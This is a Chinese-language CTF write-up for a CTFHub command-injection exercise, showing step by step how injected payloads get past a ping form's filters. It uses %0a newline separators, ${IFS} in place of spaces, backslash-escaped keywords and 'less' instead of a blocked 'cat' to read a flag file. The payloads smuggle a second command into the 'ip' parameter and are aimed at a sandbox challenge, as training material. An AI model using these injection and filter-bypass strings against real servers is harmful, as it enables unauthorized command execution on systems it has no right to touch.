CTFHub 命令注入-综合练习(学习记录)

综合过滤练习

命令分隔符的绕过姿势

;

%0a

%0d

&

那我们使用%0a试试,发现ls命令被成功执行

复制代码
/?ip=127.0.0.1%0als

发现一个名为flag_is_here的文件夹和index.php的文件,那么我们还是使用cd命令进入到文件夹下

http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1 cd flag_is_here%0als

发现空格和flag被过滤,空格绕过前面已经讲述,这里就不在赘述,直接尝试${IFS}进行空格绕过,使用fla\g反斜杠转义flag

复制代码
/?ip=127.0.0.1%0als${IFS}f\lag_is_here

成功读取flag_is_here文件夹下的内容

接下来,直接使用cat读取flag_300121897522180.php文件里的内容

发现过滤了cat,前面也讲过cat的绕过姿势,这里不在赘述,直接尝试less

复制代码
/?ip=127.0.0.1%0Acd${IFS}f\lag_is_here%0Aless${IFS}f\lag_3879302014865.php

命令执行成功,查看页面源代码得到flag

相关推荐
千寻xun9 小时前
一、理论篇-NVME协议学习笔记
笔记·学习·fpga开发·nvme ssd·nvme协议
researcher-Jiang9 小时前
高性能计算之OpenMP——超算习堂学习1
android·java·学习
MartinYeung514 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
AOwhisky15 小时前
Python 学习笔记(第三期)——流程控制:条件判断与循环结构
运维·笔记·python·学习·云原生·流程控制·循环
心中有国也有家15 小时前
AtomGit Flutter 鸿蒙客户端:白噪音场景的视觉设计
学习·flutter·华为·harmonyos
心中有国也有家15 小时前
AtomGit Flutter 鸿蒙客户端:呼吸练习的完整生命周期
学习·flutter·华为·harmonyos
Zeeland15 小时前
构建护城河:自学习 Agent
学习
尼米棕熊15 小时前
大模型学习8上-推理部署框架llama.cpp与Ollama使用指北
学习·llama
brave_zhao16 小时前
nginx的进程架构
java·学习·nginx
枫零NET16 小时前
跟着OpenCode学习Pi Coding Agent-05-Agent的类型系统
人工智能·学习